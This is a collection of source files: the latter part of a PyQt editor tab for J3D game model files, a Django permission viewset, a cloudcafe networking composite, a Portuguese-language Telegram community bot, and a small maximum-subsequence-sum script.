is_folder=False,\n file_type=\"J3D file\", file_filter=\";;\".join(filters),\n default_file_name=j3d_name\n )\n \n def load_anim(self):\n filters = []\n filters.append(\"J3D animations (*.bmt *.bls *.btk *.bck *.brk *.bpk *.btp *.bca *.bva *.bla)\")\n \n self.window().generic_do_gui_file_operation(\n op_callback=self.load_anim_by_path,\n is_opening=True, is_saving=False, is_folder=False,\n file_type=\"J3D animation\", file_filter=\";;\".join(filters),\n )\n \n \n def import_j3d_by_path(self, j3d_path):\n with open(j3d_path, \"rb\") as f:\n data = BytesIO(f.read())\n \n j3d_name = os.path.splitext(os.path.basename(j3d_path))[0]\n \n self.import_j3d_by_data(data, j3d_name)\n \n def import_j3d_by_data(self, data, j3d_name):\n j3d = self.try_read_j3d(data)\n if j3d is None:\n return\n self.j3d = j3d\n \n self.j3d_name = j3d_name\n \n self.model_loaded = False\n if self.j3d.file_type[:3] in [\"bmd\", \"bdl\"]:\n self.model_loaded = True\n \n self.reload_j3d_chunks_tree()\n \n self.try_show_model_preview(True)\n \n self.ui.export_j3d.setDisabled(False)\n self.ui.load_anim.setDisabled(not self.model_loaded)\n \n def load_anim_by_data(self, data, anim_name):\n j3d = J3D(data)\n if j3d.file_type[:3] != \"brk\":\n return\n brk = j3d\n \n self.ui.j3d_viewer.load_brk(brk)\n \n self.ui.anim_slider.setMinimum(0)\n self.ui.anim_slider.setMaximum(brk.trk1.duration-1)\n self.ui.anim_slider.setValue(0)\n \n def update_anim_frame(self, frame: int):\n self.ui.j3d_viewer.set_anim_frame(frame)\n \n def try_read_j3d(self, data):\n try:\n return J3D(data)\n except Exception as e:\n stack_trace = traceback.format_exc()\n error_message_title = \"Failed to load J3D\"\n error_message = \"Failed to load J3D with error:\\n%s\\n\\n%s\" % (str(e), stack_trace)\n QMessageBox.critical(self, error_message_title, error_message)\n return None\n \n def try_save_j3d(self):\n try:\n self.j3d.save()\n return True\n except Exception as e:\n stack_trace = traceback.format_exc()\n error_message_title = \"Failed to save J3D\"\n error_message = \"Failed to save J3D with error:\\n%s\\n\\n%s\" % (str(e), stack_trace)\n QMessageBox.critical(self, error_message_title, error_message)\n return False\n \n def reload_j3d_chunks_tree(self):\n self.ui.j3d_chunks_tree.clear()\n \n if self.isolated_visibility:\n self.toggle_isolated_visibility(update_preview=False)\n \n self.tree_widget_item_to_object = {}\n \n for chunk in self.j3d.chunks:\n chunk_size_str = self.window().stringify_number(chunk.size, min_hex_chars=5)\n \n chunk_item = QTreeWidgetItem([chunk.magic, \"\", chunk_size_str])\n self.ui.j3d_chunks_tree.addTopLevelItem(chunk_item)\n \n self.tree_widget_item_to_object[chunk_item] = chunk\n \n chunk_item.setExpanded(self.chunk_type_is_expanded.get(chunk.magic, False))\n \n if chunk.magic == \"TEX1\":\n seen_image_data_offsets = []\n seen_palette_data_offsets = []\n \n for i, texture in enumerate(chunk.textures):\n texture_name = chunk.texture_names[i]\n \n # We don't display sizes for texture headers that use image/palette datas duplicated from an earlier tex header.\n # We also don't display the 0x20 byte size of any of the headers.\n texture_total_size = 0\n if texture.image_data_offset+texture.header_offset not in seen_image_data_offsets:\n texture_total_size += fs.pad_offset_to_nearest(fs.data_len(texture.image_data), 0x20)\n seen_image_data_offsets.append(texture.image_data_offset+texture.header_offset)\n if texture.palette_data_offset+texture.header_offset not in seen_palette_data_offsets:\n texture_total_size += fs.pad_offset_to_nearest(fs.data_len(texture.palette_data), 0x20)\n seen_palette_data_offsets.append(texture.palette_data_offset+texture.header_offset)\n \n if texture_total_size == 0:\n texture_size_str = \"\"\n else:\n texture_size_str = self.window().stringify_number(texture_total_size, min_hex_chars=5)\n \n self.make_tree_widget_item(texture, chunk_item, [\"\", texture_name, texture_size_str])\n elif chunk.magic == \"MAT3\":\n for mat_index, material in enumerate(chunk.materials):\n mat_name = chunk.mat_names[mat_index]\n mat_item = self.make_tree_widget_item(material, chunk_item, [\"\", mat_name, \"\"])\n indirect = chunk.indirects[mat_index]\n self.make_tree_widget_item(indirect, mat_item, [\"\", f\"Indirect Texturing\", \"\"])\n elif chunk.magic == \"MDL3\":\n for i, mdl_entry in enumerate(chunk.entries):\n mat_name = self.j3d.mat3.mat_names[i]\n self.make_tree_widget_item(mdl_entry, chunk_item, [\"\", mat_name, \"\"])\n elif chunk.magic == \"TRK1\":\n for anim_type_index, anim_type_dict in enumerate([chunk.mat_name_to_reg_anims, chunk.mat_name_to_konst_anims]):\n anim_type = [\"Register\", \"Konstant\"][anim_type_index]\n anim_type_item = self.make_tree_widget_item(None, chunk_item, [\"\", anim_type, \"\"], True)\n for mat_name, anims in anim_type_dict.items():\n mat_item = self.make_tree_widget_item(None, anim_type_item, [\"\", mat_name, \"\"])\n for anim_index, anim in enumerate(anims):\n anim_item = self.make_tree_widget_item(anim, mat_item, [\"\", \"0x%02X\" % anim_index, \"\"])\n for track_name in [\"r\", \"g\", \"b\", \"a\"]:\n track_item = self.make_tree_widget_item(None, anim_item, [\"\", track_name.upper(), \"\"], True)\n track = getattr(anim, track_name)\n for keyframe_index, keyframe in enumerate(track.keyframes):\n self.make_tree_widget_item(keyframe, track_item, [\"\", \"0x%02X\" % keyframe_index, \"\"])\n elif chunk.magic == \"TTK1\":\n chunk_item.setExpanded(True)\n for mat_name, anims in chunk.mat_name_to_anims.items():\n mat_item = self.make_tree_widget_item(None, chunk_item, [\"\", mat_name, \"\"])\n for anim_index, anim in enumerate(anims):\n anim_item = self.make_tree_widget_item(anim, mat_item, [\"\", \"0x%02X\" % anim_index, \"\"])\n for track_name, track in anim.tracks.items():\n track_item = self.make_tree_widget_item(track, anim_item, [\"\", track_name.upper(), \"\"], True)\n for keyframe_index, keyframe in enumerate(track.keyframes):\n self.make_tree_widget_item(keyframe, track_item, [\"\", \"0x%02X\" % keyframe_index, \"\"])\n elif chunk.magic == \"JNT1\":\n for joint_index, joint in enumerate(chunk.joints):\n joint_index_str = self.window().stringify_number(joint_index, min_hex_chars=2)\n joint_name = chunk.joint_names[joint_index]\n self.make_tree_widget_item(joint, chunk_item, [\"\", f\"{joint_index_str}: {joint_name}\", \"\"])\n elif chunk.magic == \"SHP1\":\n for shape_index, shape in enumerate(chunk.shapes):\n shape_index_str = self.window().stringify_number(shape_index, min_hex_chars=2)\n self.make_tree_widget_item(shape, chunk_item, [\"\", shape_index_str, \"\"])\n elif chunk.magic == \"VTX1\":\n for vtx_fmt in chunk.vertex_formats:\n if vtx_fmt.attribute_type == GX.Attr.NULL:\n vtx_fmt_size_str = \"\"\n else:\n vtx_fmt_size = vtx_fmt.component_size * vtx_fmt.component_count * len(chunk.attributes[vtx_fmt.attribute_type])\n vtx_fmt_size_str = self.window().stringify_number(vtx_fmt_size, min_hex_chars=2)\n self.make_tree_widget_item(vtx_fmt, chunk_item, [\"\", vtx_fmt.attribute_type.name, vtx_fmt_size_str])\n elif chunk.magic == \"INF1\":\n for node_index, inf1_node in enumerate(chunk.flat_hierarchy):\n node_index_str = self.window().stringify_number(node_index, min_hex_chars=2)\n self.make_tree_widget_item(inf1_node, chunk_item, [\"\", node_index_str, \"\"])\n \n # Expand all items in the tree (for debugging):\n #for item in self.ui.j3d_chunks_tree.findItems(\"*\", Qt.MatchFlag.MatchWildcard | Qt.MatchFlag.MatchRecursive):\n # item.setExpanded(True)\n \n def make_tree_widget_item(self, obj, parent, item_args, expanded=False):\n item = QTreeWidgetItem(item_args)\n parent.addChild(item)\n item.setExpanded(expanded)\n \n if obj is not None:\n self.tree_widget_item_to_object[item] = obj\n \n return item\n \n def item_expanded(self, item):\n obj = self.tree_widget_item_to_object.get(item)\n if isinstance(obj, JChunk):\n self.chunk_type_is_expanded[obj.magic] = True\n \n def item_collapsed(self, item):\n obj = self.tree_widget_item_to_object.get(item)\n if isinstance(obj, JChunk):\n self.chunk_type_is_expanded[obj.magic] = False\n \n def widget_item_selected(self):\n layout = self.ui.scrollAreaWidgetContents.layout()\n self.clear_layout_recursive(layout)\n \n self.ui.j3d_sidebar_label.setText(\"Extra information will be displayed here as necessary.\")\n \n \n selected_items = self.ui.j3d_chunks_tree.selectedItems()\n if not selected_items:\n return\n item = selected_items[0]\n obj = self.tree_widget_item_to_object.get(item)\n \n # import cProfile, pstats\n # profiler = cProfile.Profile()\n # profiler.enable()\n \n if isinstance(obj, MDLEntry):\n self.mdl_entry_selected(obj)\n elif isinstance(obj, AnimationKeyframe):\n self.keyframe_selected(obj)\n elif isinstance(obj, UVAnimation):\n self.uv_anim_selected(obj)\n elif isinstance(obj, ColorAnimation):\n self.color_anim_selected(obj)\n elif isinstance(obj, VertexFormat):\n self.vertex_format_selected(obj)\n elif isinstance(obj, Joint):\n self.bunfoe_instance_selected(obj, \"joint\")\n elif isinstance(obj, Shape):\n self.bunfoe_instance_selected(obj, \"shape\")\n elif isinstance(obj, Material):\n self.bunfoe_instance_selected(obj, \"material\")\n elif isinstance(obj, BUNFOE):\n self.bunfoe_instance_selected(obj)\n \n if self.isolated_visibility:\n self.update_j3d_preview()\n \n # profiler.disable()\n # with open(\"profileresults.txt\", \"w\") as f:\n # ps = pstats.Stats(profiler, stream=f).sort_stats(\"cumulative\")\n # ps.print_stats()\n \n def bunfoe_instance_selected(self, instance, text=None, disabled=False):\n if text:\n self.ui.j3d_sidebar_label.setText(f\"Showing {text}.\")\n \n layout: QBoxLayout = self.ui.scrollAreaWidgetContents.layout()\n \n bunfoe_editor_widget = super().setup_editor_widget_for_bunfoe_instance(instance, disabled=disabled)\n \n layout.addWidget(bunfoe_editor_widget)\n layout.addStretch(1)\n \n return bunfoe_editor_widget\n \n def mdl_entry_selected(self, mdl_entry):\n layout = self.ui.scrollAreaWidgetContents.layout()\n \n entry_index = self.j3d.mdl3.entries.index(mdl_entry)\n mat_name = self.j3d.mat3.mat_names[entry_index]\n self.ui.j3d_sidebar_label.setText(\"Showing material display list for: %s\" % mat_name)\n \n bp_commands_widget = QWidget()\n bp_commands_layout = QVBoxLayout(bp_commands_widget)\n xf_commands_widget = QWidget()\n xf_commands_layout = QVBoxLayout(xf_commands_widget)\n \n bp_commands_scroll_area = QScrollArea()\n bp_commands_scroll_area.setWidgetResizable(True)\n bp_commands_scroll_area.setWidget(bp_commands_widget)\n \n xf_commands_scroll_area = QScrollArea()\n xf_commands_scroll_area.setWidgetResizable(True)\n xf_commands_scroll_area.setWidget(xf_commands_widget)\n \n tab_widget = QTabWidget()\n tab_widget.addTab(bp_commands_scroll_area, \"BP Commands\")\n tab_widget.addTab(xf_commands_scroll_area, \"XF Commands\")\n layout.addWidget(tab_widget)\n \n for bp_command in mdl_entry.bp_commands:\n if bp_command.register in [entry.value for entry in BPRegister]:\n reg_name = BPRegister(bp_command.register).name\n else:\n reg_name = \"0x%02X\" % bp_command.register\n command_text = \"%s: 0x%06X\" % (reg_name, bp_command.value)\n label = QLabel()\n label.setText(command_text)\n bp_commands_layout.addWidget(label)\n \n for xf_command in mdl_entry.xf_commands:\n if xf_command.register in [entry.value for entry in XFRegister]:\n reg_name = XFRegister(xf_command.register).name\n else:\n reg_name = \"0x%04X\" % xf_command.register\n command_text = \"%s:\\n%s\" % (reg_name, \"\\n\".join([\"0x%08X\" % arg for arg in xf_command.args]))\n label = QLabel()\n label.setText(command_text)\n xf_commands_layout.addWidget(label)\n \n bp_commands_layout.addItem(QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding))\n xf_commands_layout.addItem(QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding))\n \n def keyframe_selected(self, keyframe):\n layout = self.ui.scrollAreaWidgetContents.layout()\n \n self.ui.j3d_sidebar_label.setText(\"Showing animation keyframe.\")\n \n label = QLabel()\n label.setText(\"Time: %f\" % keyframe.time)\n layout.addWidget(label)\n \n label = QLabel()\n label.setText(\"Value: %f\" % keyframe.value)\n layout.addWidget(label)\n \n label = QLabel()\n label.setText(\"Tangent in: %f\" % keyframe.tangent_in)\n layout.addWidget(label)\n \n label = QLabel()\n label.setText(\"Tangent out: %f\" % keyframe.tangent_out)\n layout.addWidget(label)\n \n spacer = QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding)\n layout.addItem(spacer)\n \n def uv_anim_selected(self, uv_anim):\n layout = self.ui.scrollAreaWidgetContents.layout()\n \n self.ui.j3d_sidebar_label.setText(\"Showing UV animation.\")\n \n label = QLabel()\n label.setText(\"Center: (%f, %f, %f)\" % uv_anim.center_coords)\n layout.addWidget(label)\n \n label = QLabel()\n label.setText(\"Tex gen index: 0x%02X\" % uv_anim.tex_gen_index)\n layout.addWidget(label)\n \n spacer = QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding)\n layout.addItem(spacer)\n \n def color_anim_selected(self, color_anim):\n layout = self.ui.scrollAreaWidgetContents.layout()\n \n self.ui.j3d_sidebar_label.setText(\"Showing color animation.\")\n \n label = QLabel()\n label.setText(\"Color ID: 0x%02X\" % color_anim.color_id)\n layout.addWidget(label)\n \n spacer = QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding)\n layout.addItem(spacer)\n \n def vertex_format_selected(self, vtx_fmt: VertexFormat):\n # TODO: j3dultra segfaults if you try changing, say, an attribute type from tex0 to tex1 for\n # example (many other cases too). need to disable editing these.\n \n widget = self.bunfoe_instance_selected(vtx_fmt, \"vertex format\")\n \n for i in range(widget.layout().rowCount()):\n field_item = widget.layout().itemAt(i, QFormLayout.ItemRole.FieldRole)\n field_widget = field_item.widget()\n if field_widget.property('access_path') == [('attr', 'attribute_type')]:\n combobox: QComboBox = field_widget\n combobox.currentIndexChanged.connect(self.update_vertex_format_component_type_combobox)\n \n self.update_vertex_format_component_type_combobox()\n \n def update_vertex_format_component_type_combobox(self):\n # The component type combobox needs to have the text of its items updated dynamically depending\n # on what the currently selected attribute type is.\n # If a color attribute type is selected, display the duplicate enum names for color types.\n # Otherwise, display the duplicate enum names for number types.\n \n layout = self.ui.scrollAreaWidgetContents.layout()\n if layout.count() <= 0:\n return\n bunfoe_widget = layout.itemAt(0).widget()\n if not isinstance(bunfoe_widget, BunfoeWidget):\n return\n \n vtx_fmt = bunfoe_widget.property('field_owner')\n assert isinstance(vtx_fmt, VertexFormat)\n \n if vtx_fmt.is_color_attr:\n # Colors are at the end of GX.ComponentType's members, so go through the list forwards, so that the\n # later members overwrite the earlier ones in the dict.\n enum_value_order = {v: k for k, v in GX.ComponentType.__members__.items()}\n else:\n # Numbers are at the start of GX.ComponentType's members, so go through the list backwards, so that\n # the earlier members overwrite the later ones in the dict.\n enum_value_order = {v: k for k, v in reversed(GX.ComponentType.__members__.items())}\n \n for i in range(bunfoe_widget.layout().rowCount()):\n field_item = bunfoe_widget.layout().itemAt(i, QFormLayout.ItemRole.FieldRole)\n field_widget = field_item.widget()\n if field_widget.property('access_path') == [('attr', 'component_type')]:\n combobox = field_widget\n for i in range(combobox.count()):\n enum_value = combobox.itemData(i)\n pretty_name = self.prettify_name(enum_value_order[enum_value], title=False)\n combobox.setItemText(i, pretty_name)\n \n \n def export_j3d_by_path(self, j3d_path):\n success = self.try_save_j3d()\n if not success:\n return\n \n with open(j3d_path, \"wb\") as f:\n self.j3d.data.seek(0)\n f.write(self.j3d.data.read())\n \n self.j3d_name = os.path.splitext(os.path.basename(j3d_path))[0]\n \n QMessageBox.information(self, \"J3D file saved\", \"Successfully saved J3D file.\")\n \n def load_anim_by_path(self, anim_path):\n with open(anim_path, \"rb\") as f:\n data = BytesIO(f.read())\n \n anim_name = os.path.splitext(os.path.basename(anim_path))[0]\n \n self.load_anim_by_data(data, anim_name)\n \n def get_file_filter_by_current_j3d_file_type(self):\n if self.j3d.file_type == \"bdl4\":\n return \"Binary Display List Models (*.bdl)\"\n elif self.j3d.file_type == \"bmd3\":\n return \"Binary Models (*.bmd)\"\n elif self.j3d.file_type == \"bmt3\":\n return \"Binary Material Tables (*.bmt)\"\n elif self.j3d.file_type == \"btk1\":\n return \"Texture SRT Animations (*.btk)\"\n elif self.j3d.file_type == \"bck1\":\n return \"Joint Animations (*.bck)\"\n elif self.j3d.file_type == \"brk1\":\n return \"Texture Register Animations (*.brk)\"\n elif self.j3d.file_type == \"btp1\":\n return \"Texture Swap Animations (*.btp)\"\n else:\n return None\n \n def show_j3d_chunks_tree_context_menu(self, pos):\n if self.j3d is None:\n return\n \n item = self.ui.j3d_chunks_tree.itemAt(pos)\n obj = self.tree_widget_item_to_object.get(item)\n \n if isinstance(obj, BTI):\n texture = obj\n \n menu = QMenu(self)\n \n menu.addAction(self.ui.actionOpenJ3DImage)\n self.ui.actionOpenJ3DImage.setData(texture)\n \n menu.addAction(self.ui.actionReplaceJ3DImage)\n self.ui.actionReplaceJ3DImage.setData(texture)\n if self.bti_tab.bti is None:\n self.ui.actionReplaceJ3DImage.setDisabled(True)\n else:\n self.ui.actionReplaceJ3DImage.setDisabled(False)\n \n menu.exec_(self.ui.j3d_chunks_tree.mapToGlobal(pos))\n \n def open_image_in_j3d(self):\n texture = self.ui.actionOpenJ3DImage.data()\n \n # Need to make a fake standalone BTI texture data so we can load it without it being the TEX1 format.\n data = BytesIO()\n bti_header_bytes = fs.read_bytes(texture.data, texture.header_offset, 0x20)\n fs.write_bytes(data, 0x00, bti_header_bytes)\n \n bti_image_data = fs.read_all_bytes(texture.image_data)\n fs.write_bytes(data, 0x20, bti_image_data)\n image_data_offset = 0x20\n fs.write_u32(data, 0x1C, image_data_offset)\n \n if fs.data_len(texture.palette_data) == 0:\n palette_data_offset = 0\n else:\n bti_palette_data = fs.read_all_bytes(texture.palette_data)\n fs.write_bytes(data, 0x20 + fs.data_len(texture.image_data), bti_palette_data)\n palette_data_offset = 0x20 + fs.data_len(texture.image_data)\n fs.write_u32(data, 0x0C, palette_data_offset)\n \n texture_index = self.j3d.tex1.textures.index(texture)\n bti_name = self.j3d.tex1.texture_names[texture_index]\n \n self.bti_tab.import_bti_by_data(data, bti_name)\n \n self.window().set_tab_by_name(\"BTI Images\")\n \n def replace_image_in_j3d(self):\n texture = self.ui.actionReplaceJ3DImage.data()\n \n self.bti_tab.bti.save_changes()\n \n # Need to make a fake BTI header for it to read from.\n data = BytesIO()\n bti_header_bytes = fs.read_bytes(self.bti_tab.bti.data, self.bti_tab.bti.header_offset, 0x20)\n fs.write_bytes(data, 0x00, bti_header_bytes)\n \n texture.read_header(data)\n \n texture.image_data = fs.make_copy_data(self.bti_tab.bti.image_data)\n texture.palette_data = fs.make_copy_data(self.bti_tab.bti.palette_data)\n \n texture.save_header_changes()\n \n # Do a full reload in order to update texture size displayed in the UI.\n self.reload_j3d_chunks_tree()\n \n self.update_j3d_preview()\n \n texture_index = self.j3d.tex1.textures.index(texture)\n texture_name = self.j3d.tex1.texture_names[texture_index]\n self.window().ui.statusbar.showMessage(\"Replaced %s.\" % texture_name, 3000)\n \n def try_show_model_preview(self, reset_camera=False):\n self.ui.j3dultra_error_area.hide()\n self.ui.j3d_viewer.load_model(self.j3d, reset_camera, self.get_hidden_material_indexes())\n \n def update_j3d_preview(self):\n if self.j3d is None:\n return\n \n # TODO: implement copying just the instance, without having to serialize and deserialize it here.\n success = self.try_save_j3d()\n if not success:\n return\n \n self.try_show_model_preview(False)\n \n def update_j3d_preview(self):\n if self.j3d is None:\n return\n self.try_show_model_preview(False)\n \n def display_j3d_preview_error(self, error: str):\n self.ui.j3dultra_error_area.show()\n self.ui.j3dultra_error_label.setText(error)\n self.ui.j3d_viewer.hide()\n \n def toggle_isolated_visibility(self, checked=None, update_preview=True):\n self.isolated_visibility = not self.isolated_visibility\n if self.isolated_visibility:\n self.ui.toggle_visibility.setIcon(self.icon_visible_isolated)\n else:\n self.ui.toggle_visibility.setIcon(self.icon_visible_all)\n if update_preview:\n self.update_j3d_preview()\n \n def get_hidden_material_indexes(self):\n indexes = []\n if not self.isolated_visibility:\n return indexes\n \n selected_items = self.ui.j3d_chunks_tree.selectedItems()\n selected_mat_indexes = []\n for item in selected_items:\n if not isinstance(self.tree_widget_item_to_object.get(item), Material):\n continue\n mat_index = self.ui.j3d_chunks_tree.indexFromItem(item).row()\n selected_mat_indexes.append(mat_index)\n if not selected_mat_indexes:\n return indexes\n \n for mat_index in range(len(self.j3d.mat3.materials)):\n if mat_index not in selected_mat_indexes:\n indexes.append(mat_index)\n return indexes\n","sub_path":"gcft_ui/j3d_tab.py","file_name":"j3d_tab.py","file_ext":"py","file_size_in_byte":27401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"32025716","text":"from .viewset_includes import *\n\nclass PermissionViewSet(viewsets.ViewSet):\n permission_classes = (IsAuthenticated,)\n queryset = Permission.objects.all()\n\n def get_object(self, pk=None):\n try:\n return Permission.objects.get(pk = pk)\n except Permission.DoesNotExist:\n raise Http404 \n \n def list(self, request):\n Security.secureAccess(self, 'view_permission', request) \n paginator = ResponsePaginationHelper()\n results = paginator.paginate_queryset(self.queryset, request)\n serializer = PermissionSerializer(results, many=True)\n UserLogHelper.createLog(request, request.method, request.user.id)\n return paginator.get_paginated_response(serializer.data)\n\n def create (self, request):\n Security.secureAccess(self, 'add_permission', request) \n serializer = PermissionSerializer(data = request.data)\n if serializer.is_valid():\n serializer.save() \n UserLogHelper.createLog(request, request.method, request.user.id)\n return Response(serializer.data, status = status.HTTP_201_CREATED) \n return Response(serializer.errors, status = status.HTTP_400_BAD_REQUEST) \n\n def update(self, request, pk=None):\n Security.secureAccess(self, 'change_permission', request) \n permission = self.get_object(pk) \n serializer = PermissionSerializer(permission, data = request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data) \n return Response(serializer.errors, status = status.HTTP_400_BAD_REQUEST) \n\n def retrieve(self, request, pk=None):\n Security.secureAccess(self, 'view_permission', request) \n permission = self.get_object(pk)\n serializer = PermissionSerializer(permission)\n return Response(serializer.data) \n\n def destroy(self, request, pk=None):\n Security.secureAccess(self, 'delete_permission', request) \n permission = self.get_object(pk)\n permission.delete()\n UserLogHelper.createLog(request.data, request.method, request.user.id)\n return Response(status=status.HTTP_204_NO_CONTENT) ","sub_path":"api/view_sets/permission_view.py","file_name":"permission_view.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"424254263","text":"\"\"\"\nCopyright 2015 Rackspace\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nfrom cloudcafe.networking.networks.composites import _NetworkingAuthComposite\nfrom cloudcafe.networking.networks.extensions.limits_api.behaviors \\\n import LimitsBehaviors\nfrom cloudcafe.networking.networks.extensions.limits_api.client \\\n import LimitsClient\nfrom cloudcafe.networking.networks.extensions.limits_api.config \\\n import LimitsConfig\n\n\nclass LimitsComposite(object):\n networking_auth_composite = _NetworkingAuthComposite\n\n def __init__(self, auth_composite=None):\n auth_composite = auth_composite or self.networking_auth_composite()\n self.url = auth_composite.networking_url\n self.user = auth_composite._auth_user_config\n self.config = LimitsConfig()\n self.client = LimitsClient(**auth_composite.client_args)\n\n self.behaviors = LimitsBehaviors(\n limits_client=self.client, limits_config=self.config)\n","sub_path":"cloudcafe/networking/networks/extensions/limits_api/composites.py","file_name":"composites.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"95656108","text":"import telebot\nfrom telebot.util import extract_arguments\nimport os\nimport logging\nimport pytz\nfrom datetime import datetime, timedelta\n\n\nimport db\nfrom mensagens import *\n\nAPI_TOKEN = os.getenv('API_TOKEN')\nDB_NAME = os.getenv('BOT_DB', \"membros.db\")\n\nassert API_TOKEN is not None\n\nbot = telebot.TeleBot(API_TOKEN, threaded=True)\n\ndb.inicializa(DB_NAME)\n\ndb.lista()\n\nmanaus = pytz.timezone(\"America/Manaus\")\nbelem = pytz.timezone(\"America/Belem\")\nrio_branco = pytz.timezone(\"America/Rio_Branco\")\nbruxelas = pytz.timezone(\"Europe/Brussels\")\npalmas = pytz.timezone(\"America/Araguaina\")\n\n# Hora em que o último aviso foi postado no grupo\n# Usado para evitar que usuários abusem do espaço do grupo para comandos\nultimo_aviso = None\nultimo_novo = None\n\n\ndef em_grupo(mensagem):\n return mensagem.chat.type in [\"group\", \"supergroup\"]\n\ndef destino(mensagem):\n return mensagem.chat.id\n\ndef bot_responda(mensagem, resposta):\n chat_id = destino(mensagem)\n bot.send_message(chat_id, resposta)\n\ndef nome(mensagem):\n nome = mensagem.from_user.first_name\n if not nome:\n return mensagem.from_user.username\n return nome\n\n\ndef protecao_spam_do_grupo(mensagem):\n global ultimo_aviso\n if em_grupo(mensagem):\n if not ultimo_aviso or datetime.now() - ultimo_aviso > timedelta(minutes=15):\n bot_responda(mensagem, BOT_PRIVADO)\n ultimo_aviso = datetime.now()\n return True\n else:\n return False\n\n@bot.message_handler(content_types=['new_chat_participant'])\ndef send_novo(message):\n global ultimo_novo\n nome_u = nome(message)\n if not ultimo_novo or datetime.now() - ultimo_novo > timedelta(minutes=5):\n bot_responda(message, START.format(nome_u))\n else:\n bot_responda(message, START_REPETIDO.format(nome_u))\n ultimo_novo = datetime.now()\n\n\n@bot.message_handler(commands=['start'])\ndef send_welcome(message):\n if protecao_spam_do_grupo(message):\n return\n bot_responda(message, START.format(nome(message)))\n\n\n\n@bot.message_handler(commands=['help', 'ajuda'])\ndef send_help(message):\n if protecao_spam_do_grupo(message):\n return\n bot_responda(message, AJUDA)\n\n\n@bot.message_handler(commands=['link', 'links'])\ndef send_link(message):\n if protecao_spam_do_grupo(message):\n return\n bot_responda(message, LINKS)\n\n\n@bot.message_handler(commands=['estados'])\ndef send_estados(message):\n if protecao_spam_do_grupo(message):\n return\n bot_responda(message, LISTA_DE_ESTADOS)\n\n\n@bot.message_handler(commands=['whoami'])\ndef send_whoami(message):\n if protecao_spam_do_grupo(message):\n return\n bot_responda(message, WHOAMI.format(message.from_user))\n\n\n@bot.message_handler(commands=['lista'])\ndef send_lista(message):\n bot_responda(message, db.lista_users())\n\n\n@bot.message_handler(commands=['nomes', 'membros'])\ndef send_nomes(message):\n if protecao_spam_do_grupo(message):\n return\n bot_responda(message, db.lista_users_por_nome())\n\n\n@bot.message_handler(commands=['estatistica', 'contador', 'total', 'stat', 'stats'])\ndef send_stats(message):\n if protecao_spam_do_grupo(message):\n return\n stats = db.get_stats()\n estatistica = STAT_CAB\n for estado in stats[0]:\n estatistica += STAT_ESTADO.format(estado)\n estatistica += STAT_ROD.format(stats[1])\n bot_responda(message, estatistica)\n\n\n@bot.message_handler(commands=['eventos'])\ndef send_eventos(message):\n if protecao_spam_do_grupo(message):\n return\n eventos = db.get_eventos()\n mensagem = EVENTOS_CAB\n for evento in eventos:\n base = pytz.utc.localize(evento[1])\n m = manaus.normalize(base)\n b = belem.normalize(base)\n r = rio_branco.normalize(base)\n mensagem += EVENTOS_DESC.format(evento, r, m, b)\n mensagem += EVENTOS_ROD\n bot_responda(message, mensagem)\n\n\n@bot.message_handler(commands=['membro', 'mecadastra', 'novo'])\ndef send_membro(message):\n if protecao_spam_do_grupo(message):\n return\n params = extract_arguments(message.text)\n if not params:\n bot_responda(message, MEMBRO_AJUDA)\n return\n estado = params.lower().strip()\n\n db_estado = db.get_estado(estado)\n if db_estado:\n db.update_user(message.from_user, db_estado)\n bot_responda(message, MEMBRO_RESULTADO.format(message.from_user, estado.title()))\n else:\n bot_responda(message, MEMBRO_ESTADO.format(message.chat, estado))\n\n if not message.from_user.last_name:\n bot_responda(message, TELEGRAM_ULTIMO_NOME_AJUDA)\n\n if not message.from_user.username:\n bot_responda(message, TELEGRAM_NOME_USUARIO_AJUDA)\n\n@bot.message_handler(commands=['hora', 'horas', 'agora', 'now'])\ndef send_hora(message):\n if protecao_spam_do_grupo(message):\n return\n agora = datetime.utcnow().replace(tzinfo=pytz.utc)\n horarios = {\n \"manaus\": manaus.normalize(agora),\n \"belem\": belem.normalize(agora),\n \"riobranco\": rio_branco.normalize(agora),\n \"palmas\": palmas.normalize(agora),\n \"bruxelas\": bruxelas.normalize(agora)\n }\n bot_responda(message, HORA.format(**horarios))\n\nif __name__ == '__main__':\n _logger = telebot.logger\n telebot.logger.setLevel(logging.DEBUG)\n bot.polling(none_stop=True)\n \n \n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"63551128","text":"import sys\n#from sys import maxsize\n'''\ndef max_subsequence_sum(numbers, size):\n max_so_far = -maxsize-1\n max_ending_here = 0\n\n for i in range(size):\n max_ending_here = max_ending_here + numbers[i]\n if max_so_far < max_ending_here:\n max_so_far = max_ending_here\n if max_ending_here < 0:\n max_ending_here = 0\n return max_so_far\n'''\n#dynamic programming\ndef max_subsequence_sum(numbers, size):\n max_so_far =numbers[0] \n curr_max = numbers[0] \n \n for i in range(1,size): \n curr_max = max(numbers[i], curr_max + numbers[i]) \n max_so_far = max(max_so_far,curr_max) \n \n return max_so_far \n\ndef main():\n numbers = sys.stdin.readline().strip('\\n').split()\n numbers = list(map(int,numbers))\n\n result = max_subsequence_sum(numbers, len(numbers))\n print(result)\n 